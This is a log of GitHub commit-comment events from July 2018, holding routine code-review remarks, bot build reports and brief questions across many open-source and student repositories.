{"id":"8008866415","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29811311,"position":23,"line":23,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/interface.rb","commit_id":"be917a850a791abbdc4b9d0a3b87273425f0e297","created_at":"2018-07-24T09:14:28Z","updated_at":"2018-07-24T09:14:28Z","author_association":"OWNER","body":"ponyal...ispravlyayu"}},"created_at":"2018-07-24T09:14:28Z"}
{"id":"8008868737","type":"CommitCommentEvent","actor":{"login":"Fatty-Fish"},"repo":{"name":"Fatty-Fish/baiduPage"},"payload":{"comment":{"id":29811316,"position":null,"line":null,"path":null,"commit_id":"bb9ca2e7df00bb43e91e0114e7c3d218cb66de46","created_at":"2018-07-24T09:14:55Z","updated_at":"2018-07-24T09:14:55Z","author_association":"OWNER","body":"npm install"}},"created_at":"2018-07-24T09:14:55Z"}
{"id":"8008869566","type":"CommitCommentEvent","actor":{"login":"TheAz928"},"repo":{"name":"CubePM/MysteryBox"},"payload":{"comment":{"id":29811318,"position":5,"line":18,"path":"README.md","commit_id":"ceedb7f8a8b5bd0bd911a6db6cd4fb651dfba8dd","created_at":"2018-07-24T09:15:03Z","updated_at":"2018-07-24T09:15:03Z","author_association":"COLLABORATOR","body":"Blame keyboard 😂"}},"created_at":"2018-07-24T09:15:03Z"}
{"id":"8008869702","type":"CommitCommentEvent","actor":{"login":"martynazawadzka"},"repo":{"name":"martynazawadzka/Infinity"},"payload":{"comment":{"id":29811319,"position":5,"line":5,"path":"README.md","commit_id":"841e26ed27b9b6da0c0522cae5e180799d2669b9","created_at":"2018-07-24T09:15:05Z","updated_at":"2018-07-24T09:15:05Z","author_association":"OWNER","body":"Opublikowany projekt można znaleźć pod adresem: https://martynazawadzka.github.io/Infinity/"}},"created_at":"2018-07-24T09:15:05Z"}
{"id":"8008870867","type":"CommitCommentEvent","actor":{"login":"cthoyt"},"repo":{"name":"sorgerlab/indra"},"payload":{"comment":{"id":29811323,"position":null,"line":null,"path":null,"commit_id":"8ea86ae197ada0382c6ea0da3ad6c1aa466185d7","created_at":"2018-07-24T09:15:18Z","updated_at":"2018-07-24T09:15:18Z","author_association":"CONTRIBUTOR","body":"I was curious - is there a reason you don't use `six.string_types`?"}},"created_at":"2018-07-24T09:15:18Z"}
{"id":"8008875069","type":"CommitCommentEvent","actor":{"login":"martynazawadzka"},"repo":{"name":"martynazawadzka/Infinity"},"payload":{"comment":{"id":29811332,"position":4,"line":4,"path":"README.md","commit_id":"841e26ed27b9b6da0c0522cae5e180799d2669b9","created_at":"2018-07-24T09:16:04Z","updated_at":"2018-07-24T09:16:04Z","author_association":"OWNER","body":"Opublikowany projekt można znaleźć pod adresem: https://martynazawadzka.github.io/Infinity/"}},"created_at":"2018-07-24T09:16:04Z"}
{"id":"8008880001","type":"CommitCommentEvent","actor":{"login":"FreeGamingHere"},"repo":{"name":"CubePM/MysteryBox"},"payload":{"comment":{"id":29811338,"position":5,"line":18,"path":"README.md","commit_id":"ceedb7f8a8b5bd0bd911a6db6cd4fb651dfba8dd","created_at":"2018-07-24T09:17:00Z","updated_at":"2018-07-24T09:17:00Z","author_association":"NONE","body":"Both are correct, customizable is in the AE and customisable in the BE"}},"created_at":"2018-07-24T09:17:00Z"}
{"id":"8008880450","type":"CommitCommentEvent","actor":{"login":"martynazawadzka"},"repo":{"name":"martynazawadzka/Infinity"},"payload":{"comment":{"id":29811341,"position":7,"line":7,"path":"README.md","commit_id":"841e26ed27b9b6da0c0522cae5e180799d2669b9","created_at":"2018-07-24T09:17:05Z","updated_at":"2018-07-24T09:17:05Z","author_association":"OWNER","body":"Published projekt is available here: https://martynazawadzka.github.io/Infinity/ ."}},"created_at":"2018-07-24T09:17:05Z"}
{"id":"8008880710","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29811342,"position":37,"line":338,"path":"application/helpers/SurveyRuntimeHelper.php","commit_id":"e5ec3c1d48beaa64435d3c932b18e61eff8a5553","created_at":"2018-07-24T09:17:08Z","updated_at":"2018-07-24T09:17:08Z","author_association":"CONTRIBUTOR","body":"Will have to make a test for this."}},"created_at":"2018-07-24T09:17:08Z"}
{"id":"8008881258","type":"CommitCommentEvent","actor":{"login":"isublimity"},"repo":{"name":"smi2/phpClickHouse"},"payload":{"comment":{"id":29811346,"position":25,"line":200,"path":"README.md","commit_id":"9c577dd82d2b4c7950fe1b1159b7c5ce1358dea7","created_at":"2018-07-24T09:17:13Z","updated_at":"2018-07-24T09:17:13Z","author_association":"CONTRIBUTOR","body":"`http://blabla.com/urls:8765` is not valid URI Generic Syntax\r\n`http://blabla.com/urls` is valid, phpCH if find char `: or /` - drop use ports \r\nMore example https://github.com/smi2/phpClickHouse/blob/master/tests/UriTest.php#L67\r\n  \r\n"}},"created_at":"2018-07-24T09:17:13Z"}
{"id":"8008881754","type":"CommitCommentEvent","actor":{"login":"hristoforliazsa"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29811348,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T09:17:18Z","updated_at":"2018-07-24T09:17:18Z","author_association":"NONE","body":"Impresive idea and project!"}},"created_at":"2018-07-24T09:17:18Z"}
{"id":"8008884280","type":"CommitCommentEvent","actor":{"login":"mlschroe"},"repo":{"name":"MoarVM/MoarVM"},"payload":{"comment":{"id":29811354,"position":null,"line":null,"path":null,"commit_id":"7906b5d6f68f5d8566ae0dda8642c590063c2706","created_at":"2018-07-24T09:17:47Z","updated_at":"2018-07-24T09:17:47Z","author_association":"NONE","body":"That gc_free definition looks suspect to me. It doesn't seem to be used currently."}},"created_at":"2018-07-24T09:17:47Z"}
{"id":"8008888038","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"DronMDF/zold-lazy-node"},"payload":{"comment":{"id":29811358,"position":null,"line":null,"path":null,"commit_id":"1c238b39e1b9a9b06fdb4edee3593b7ed28e3a97","created_at":"2018-07-24T09:18:25Z","updated_at":"2018-07-24T09:18:25Z","author_association":"COLLABORATOR","body":"Puzzle `51-784537fb` disappeared from [`test/node/score.py`](https://github.com/DronMDF/zold-lazy-node/blob/master/test/node/score.py), that's why I closed #60. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-24T09:18:25Z"}
{"id":"8008888732","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29811361,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-24T09:18:33Z","updated_at":"2018-07-24T09:18:33Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-24T09:18:33Z"}
{"id":"8008891451","type":"CommitCommentEvent","actor":{"login":"carandraug"},"repo":{"name":"MicronOxford/cockpit"},"payload":{"comment":{"id":29811365,"position":null,"line":null,"path":null,"commit_id":"961a3cc643016700b444cc9749b7666060e6bf53","created_at":"2018-07-24T09:19:04Z","updated_at":"2018-07-24T09:19:04Z","author_association":"MEMBER","body":"On Tue, 24 Jul 2018, 08:00 Ian Dobbie, <notifications@github.com> wrote:\n\n> Can someone try this on deepsim this week to see if it fixes the\n> excitation wavelength issue?\n>\n\nI already did that. I only pushed this commit after having tried it on\ndeepsim and then reconstruction on softworx.\n\n>\n"}},"created_at":"2018-07-24T09:19:04Z"}
{"id":"8008893091","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29811369,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-24T09:19:21Z","updated_at":"2018-07-24T09:19:21Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-24T09:19:21Z"}
{"id":"8008895852","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29811372,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-24T09:19:54Z","updated_at":"2018-07-24T09:19:54Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-24T09:19:54Z"}
{"id":"8008898341","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29811375,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-24T09:20:21Z","updated_at":"2018-07-24T09:20:21Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-24T09:20:21Z"}
{"id":"8008898571","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29811376,"position":23,"line":23,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/interface.rb","commit_id":"be917a850a791abbdc4b9d0a3b87273425f0e297","created_at":"2018-07-24T09:20:23Z","updated_at":"2018-07-24T09:20:23Z","author_association":"OWNER","body":"Pytayus otlovit oshybku Train.new(number_train) v interface.rb method add_train....pishet chto ne pravilny format nomera....hotya...phormat pravilny....ne pomuuu"}},"created_at":"2018-07-24T09:20:23Z"}
{"id":"8008899098","type":"CommitCommentEvent","actor":{"login":"jastro56"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29811379,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T09:20:29Z","updated_at":"2018-07-24T09:20:29Z","author_association":"NONE","body":"Good project"}},"created_at":"2018-07-24T09:20:29Z"}
{"id":"8008900387","type":"CommitCommentEvent","actor":{"login":"myLoveIsYou"},"repo":{"name":"myLoveIsYou/textT"},"payload":{"comment":{"id":29811380,"position":null,"line":null,"path":null,"commit_id":"282b5a097de7e4c139a02fdeceda1985e0ad6fd7","created_at":"2018-07-24T09:20:44Z","updated_at":"2018-07-24T09:20:44Z","author_association":"OWNER","body":",,"}},"created_at":"2018-07-24T09:20:44Z"}
{"id":"8008901177","type":"CommitCommentEvent","actor":{"login":"jnthn"},"repo":{"name":"MoarVM/MoarVM"},"payload":{"comment":{"id":29811382,"position":null,"line":null,"path":null,"commit_id":"7906b5d6f68f5d8566ae0dda8642c590063c2706","created_at":"2018-07-24T09:20:52Z","updated_at":"2018-07-24T09:20:52Z","author_association":"MEMBER","body":"@mlschroe Thanks, good catch. Fixed in https://github.com/MoarVM/MoarVM/commit/4199a95649."}},"created_at":"2018-07-24T09:20:52Z"}
{"id":"8008902173","type":"CommitCommentEvent","actor":{"login":"myLoveIsYou"},"repo":{"name":"myLoveIsYou/textT"},"payload":{"comment":{"id":29811384,"position":null,"line":null,"path":null,"commit_id":"282b5a097de7e4c139a02fdeceda1985e0ad6fd7","created_at":"2018-07-24T09:21:04Z","updated_at":"2018-07-24T09:21:04Z","author_association":"OWNER","body":"kkkkk"}},"created_at":"2018-07-24T09:21:04Z"}
{"id":"8008908299","type":"CommitCommentEvent","actor":{"login":"otacke"},"repo":{"name":"h5p/h5p-drag-n-bar"},"payload":{"comment":{"id":29811396,"position":null,"line":null,"path":null,"commit_id":"27abef6d855290cfcc86ae2d08d88f3741693ade","created_at":"2018-07-24T09:22:08Z","updated_at":"2018-07-24T09:22:08Z","author_association":"CONTRIBUTOR","body":"Good point. Had not thought of this. Changed it to not rely on an id."}},"created_at":"2018-07-24T09:22:08Z"}
{"id":"8008909436","type":"CommitCommentEvent","actor":{"login":"publishers"},"repo":{"name":"publishers/Excel-Object-Mapper"},"payload":{"comment":{"id":29811399,"position":209,"line":209,"path":"src/main/java/com/excel/mapper/ExcelObjectMapper.java","commit_id":"2ab66ed75a128da3897cbe6ffbbe761b49cfad06","created_at":"2018-07-24T09:22:20Z","updated_at":"2018-07-24T09:22:20Z","author_association":"OWNER","body":"rename this method to findAnnotation"}},"created_at":"2018-07-24T09:22:20Z"}
{"id":"8008913744","type":"CommitCommentEvent","actor":{"login":"mitchins"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29811406,"position":null,"line":null,"path":null,"commit_id":"a109caf76a9432a80ba408a5250aa454fc8bee0c","created_at":"2018-07-24T09:23:11Z","updated_at":"2018-07-24T09:23:11Z","author_association":"NONE","body":"@fabled why `+#warning usage of non-standard #include <sys/cdefs.h> is deprecated` ? it causes some compilation issues in MicroPython "}},"created_at":"2018-07-24T09:23:11Z"}
{"id":"8008916156","type":"CommitCommentEvent","actor":{"login":"Aamir33"},"repo":{"name":"AakifBhat/Picker-Demo"},"payload":{"comment":{"id":29811409,"position":13,"line":13,"path":"DatePicker/main.m","commit_id":"e48e7d64d479f68d991fa91a80468f76735d5b0b","created_at":"2018-07-24T09:23:38Z","updated_at":"2018-07-24T09:23:38Z","author_association":"NONE","body":"this need pasrmeters"}},"created_at":"2018-07-24T09:23:38Z"}
{"id":"8008917414","type":"CommitCommentEvent","actor":{"login":"callmeblue"},"repo":{"name":"Arkanayan/Pharmacy-Android"},"payload":{"comment":{"id":29811411,"position":30,"line":37,"path":"app/src/main/java/com/ahanapharmacy/app/App.java","commit_id":"22af849b8f9f9ff4d2c8cb0f5b7e27db86f02fa5","created_at":"2018-07-24T09:23:53Z","updated_at":"2018-07-24T09:23:53Z","author_association":"NONE","body":"Where is actual 'TWITTER_KEY' initialise  @Arkanayan #1 "}},"created_at":"2018-07-24T09:23:53Z"}
{"id":"8008947562","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29811459,"position":16,"line":15,"path":"order/serializers.py","commit_id":"ccd31d49389e46d9c9dba12d2dee5c9d680fd785","created_at":"2018-07-24T09:29:23Z","updated_at":"2018-07-24T09:29:23Z","author_association":"NONE","body":"Закомментированный код?"}},"created_at":"2018-07-24T09:29:23Z"}
{"id":"8008954043","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29811473,"position":22,"line":164,"path":"assembl/static2/js/app/components/debate/common/post/postBody.jsx","commit_id":"96c6e3b8e9ce74034654bedff198bc4ba56907ca","created_at":"2018-07-24T09:30:32Z","updated_at":"2018-07-24T09:30:32Z","author_association":"CONTRIBUTOR","body":"@amensouissi connectedUserId was always true, because you encoded null in base64."}},"created_at":"2018-07-24T09:30:32Z"}
{"id":"8008957595","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29811479,"position":null,"line":null,"path":null,"commit_id":"48202596cd38b37c2304ed87c37e5a6142992058","created_at":"2018-07-24T09:31:10Z","updated_at":"2018-07-24T09:31:10Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1696 of 1696 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-48202596cd38b37c2304ed87c37e5a6142992058-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-48202596cd38b37c2304ed87c37e5a6142992058-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-48202596cd38b37c2304ed87c37e5a6142992058-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.04%25-green.png)</a>\n"}},"created_at":"2018-07-24T09:31:10Z"}
{"id":"8008959259","type":"CommitCommentEvent","actor":{"login":"inwaziaz"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29811480,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T09:31:28Z","updated_at":"2018-07-24T09:31:28Z","author_association":"NONE","body":"hot project!!!"}},"created_at":"2018-07-24T09:31:28Z"}
{"id":"8008962473","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29811485,"position":7,"line":7,"path":"order/permissions.py","commit_id":"ccd31d49389e46d9c9dba12d2dee5c9d680fd785","created_at":"2018-07-24T09:32:01Z","updated_at":"2018-07-24T09:32:01Z","author_association":"NONE","body":"return request.method not in ['DELETE', 'POST', 'PATCH'] or (\r\n            request.user == obj.author)"}},"created_at":"2018-07-24T09:32:01Z"}
{"id":"8008963382","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"HaxeCheckstyle/haxe-formatter"},"payload":{"comment":{"id":29811490,"position":15,"line":39,"path":"test/TestCaseMacro.hx","commit_id":"197b652f4811f6b27ded7627e905d282cd1cc107","created_at":"2018-07-24T09:32:11Z","updated_at":"2018-07-24T09:32:11Z","author_association":"MEMBER","body":"Wow, that's _much_ nicer! 👍 "}},"created_at":"2018-07-24T09:32:11Z"}
{"id":"8008964395","type":"CommitCommentEvent","actor":{"login":"amensouissi"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29811492,"position":34,"line":201,"path":"assembl/static2/js/app/components/debate/common/post/postBody.jsx","commit_id":"96c6e3b8e9ce74034654bedff198bc4ba56907ca","created_at":"2018-07-24T09:32:22Z","updated_at":"2018-07-24T09:32:22Z","author_association":"CONTRIBUTOR","body":"we need to remove this connect. We need to use `getConnectedUserId()`"}},"created_at":"2018-07-24T09:32:22Z"}
{"id":"8008967477","type":"CommitCommentEvent","actor":{"login":"jotomo"},"repo":{"name":"MilosKozak/AndroidAPS"},"payload":{"comment":{"id":29811496,"position":5,"line":163,"path":"app/src/main/java/info/nightscout/androidaps/plugins/Overview/Dialogs/NewCarbsDialog.java","commit_id":"fa67aa69d5d3f3881d08ae5a8c4b4da8843c16e7","created_at":"2018-07-24T09:32:56Z","updated_at":"2018-07-24T09:32:56Z","author_association":"CONTRIBUTOR","body":"@AdrianLxM Sorry, I fucked this up; see the comment at onCheckChanged();\r\nIf activating a hypo tt, checking the toggle and registering a click handler is required.\r\nWhen not activiting a hypo tt, registering a checkedChanged hander is required.\r\nCurrent version doesn't allow unchecking if preset, since checkedChange is not dispatched when pressing an enabled radio. So something like this might work:\r\n```\r\n         if (bgReading != null && bgReading.value < 72) {\r\n             startHypoTTCheckbox.setChecked(true);\r\n             startHypoTTCheckbox.setOnClickListener(this);\r\n         } else {\r\n             startHypoTTCheckbox.setOnCheckedChangeListener(this);\r\n        }\r\n```\r\nI can fix and test this later if you like.\r\n"}},"created_at":"2018-07-24T09:32:56Z"}
{"id":"8008973105","type":"CommitCommentEvent","actor":{"login":"albandescottes"},"repo":{"name":"JeffreyGoncalves/OldAvatar"},"payload":{"comment":{"id":29811505,"position":null,"line":null,"path":null,"commit_id":"7b95662996f3e01bdb4642b61af95ed91cbfc7ef","created_at":"2018-07-24T09:33:56Z","updated_at":"2018-07-24T09:33:56Z","author_association":"COLLABORATOR","body":"Improvement"}},"created_at":"2018-07-24T09:33:56Z"}
{"id":"8008975891","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29811508,"position":37,"line":338,"path":"application/helpers/SurveyRuntimeHelper.php","commit_id":"e5ec3c1d48beaa64435d3c932b18e61eff8a5553","created_at":"2018-07-24T09:34:27Z","updated_at":"2018-07-24T09:34:27Z","author_association":"COLLABORATOR","body":"I see the fix https://github.com/LimeSurvey/LimeSurvey/commit/f99c977492b6b0b46faf5fbe27e50dd56869f21f . I think i badly understand the issue from @LouisGac ;) .\r\n\r\nStrange : i remind of same issue in 2.6lts (all question are shown with randomization) but don't find the fix."}},"created_at":"2018-07-24T09:34:27Z"}
{"id":"8008977527","type":"CommitCommentEvent","actor":{"login":"Nummo"},"repo":{"name":"Nummo/danwedscords"},"payload":{"comment":{"id":29811513,"position":null,"line":null,"path":null,"commit_id":"25651c13201dca7b97a716896edba80a01060b75","created_at":"2018-07-24T09:34:45Z","updated_at":"2018-07-24T09:34:45Z","author_association":"OWNER","body":"https://nummo.github.io/danwedscords/"}},"created_at":"2018-07-24T09:34:45Z"}
{"id":"8008978257","type":"CommitCommentEvent","actor":{"login":"gmltA"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29811514,"position":70,"line":69,"path":"BsuirFind.Foundation/Services/GameService.cs","commit_id":"520cbb750cc4819b3f55e634f4e1283f5a904b26","created_at":"2018-07-24T09:34:53Z","updated_at":"2018-07-24T09:34:53Z","author_association":"COLLABORATOR","body":"aaaaand we are saving the same object we got from DB, not the updated one.\r\nWe should map incoming DTO to a new `Game` entity instead,"}},"created_at":"2018-07-24T09:34:53Z"}
{"id":"8008980958","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-lang/flow"},"payload":{"comment":{"id":29811518,"position":18,"line":610,"path":"lib/flow.ex","commit_id":"16fecf4bafef60a4d1742d889c28a0abe661cb30","created_at":"2018-07-24T09:35:23Z","updated_at":"2018-07-24T09:35:23Z","author_association":"MEMBER","body":"Yes, that's what I thought. But if we don't have merge/2 around then it means we can deprecate this properly too."}},"created_at":"2018-07-24T09:35:23Z"}
{"id":"8008983256","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29811522,"position":8,"line":8,"path":"lesson2/buyers_list.rb","commit_id":"92d91dc53c0cb342d4d32e22099cc19a4804ec0e","created_at":"2018-07-24T09:35:49Z","updated_at":"2018-07-24T09:35:49Z","author_association":"NONE","body":"Ну, если пользователь введет просто нажмет enter. Метод gets вернет пустую строку. А пустя строка это правдивое значение и выполенние пойдет дальше."}},"created_at":"2018-07-24T09:35:49Z"}
{"id":"8008984170","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29811523,"position":46,"line":30,"path":"order/views.py","commit_id":"ccd31d49389e46d9c9dba12d2dee5c9d680fd785","created_at":"2018-07-24T09:36:00Z","updated_at":"2018-07-24T09:36:00Z","author_association":"NONE","body":"Сделать это надо через serializer. И тогда не надо лишгенр писать. Ворма тут не совсем подойтет. По сути serializer работает как форма. ТОлько выдает объект в виде json. И если заюзать viewsets.ModelViewSet не надо проверять на все эти методы(post, delete)\r\n\r\nПерепиши все в классах\r\n\r\nserialiser -> views -> urls"}},"created_at":"2018-07-24T09:36:00Z"}
{"id":"8008985124","type":"CommitCommentEvent","actor":{"login":"neeradaskyhightest4"},"repo":{"name":"skyhightest4org1/Hello"},"payload":{"comment":{"id":29811524,"position":null,"line":null,"path":null,"commit_id":"37bea3b471eacd1a039caf79318d77d3a46381fa","created_at":"2018-07-24T09:36:09Z","updated_at":"2018-07-24T09:36:09Z","author_association":"CONTRIBUTOR","body":"M99.01"}},"created_at":"2018-07-24T09:36:09Z"}
{"id":"8008986296","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29811528,"position":13,"line":13,"path":"lesson2/buyers_list.rb","commit_id":"92d91dc53c0cb342d4d32e22099cc19a4804ec0e","created_at":"2018-07-24T09:36:22Z","updated_at":"2018-07-24T09:36:22Z","author_association":"NONE","body":"Метод gets и так всегда возвращает строки. Нет нужды вызывать to_s"}},"created_at":"2018-07-24T09:36:22Z"}
{"id":"8008989941","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29811536,"position":35,"line":20,"path":"order/views.py","commit_id":"ccd31d49389e46d9c9dba12d2dee5c9d680fd785","created_at":"2018-07-24T09:37:01Z","updated_at":"2018-07-24T09:37:01Z","author_association":"NONE","body":"Это все делает ModelViewSet"}},"created_at":"2018-07-24T09:37:01Z"}
{"id":"8008990105","type":"CommitCommentEvent","actor":{"login":"Shoaib0597"},"repo":{"name":"Martichou/potter"},"payload":{"comment":{"id":29811537,"position":null,"line":null,"path":null,"commit_id":"1bc2c568f4df62d01b6b630148eaedae36df185f","created_at":"2018-07-24T09:37:03Z","updated_at":"2018-07-24T09:37:03Z","author_association":"NONE","body":"@Martichou \r\n\r\nHey, from where did you get the Energy Model? BTW, I am working on getting EAS on my MSM8937 Device (which contains 8 Cortex-a53 Cores similar to yours). So, can I use this Energy Model? It should work, right?\r\n\r\nThanks!"}},"created_at":"2018-07-24T09:37:03Z"}
{"id":"8008991106","type":"CommitCommentEvent","actor":{"login":"jgribonvald"},"repo":{"name":"bjagg/uPortal"},"payload":{"comment":{"id":29811539,"position":null,"line":null,"path":null,"commit_id":"375f9c128971d3224c624d39179aaecff8a1706a","created_at":"2018-07-24T09:37:15Z","updated_at":"2018-07-24T09:37:15Z","author_association":"NONE","body":"Hi Benito did you succeed with this code ?\r\n"}},"created_at":"2018-07-24T09:37:15Z"}
{"id":"8008991941","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29811541,"position":16,"line":16,"path":"lesson2/buyers_list.rb","commit_id":"92d91dc53c0cb342d4d32e22099cc19a4804ec0e","created_at":"2018-07-24T09:37:24Z","updated_at":"2018-07-24T09:37:24Z","author_association":"NONE","body":"Только лучше использовать новый синтаксис хэшей. `name: { ...`"}},"created_at":"2018-07-24T09:37:24Z"}
{"id":"8008994007","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29811549,"position":70,"line":56,"path":"order/views.py","commit_id":"ccd31d49389e46d9c9dba12d2dee5c9d680fd785","created_at":"2018-07-24T09:37:46Z","updated_at":"2018-07-24T09:37:46Z","author_association":"NONE","body":"все это есть в ModelViewSet"}},"created_at":"2018-07-24T09:37:46Z"}
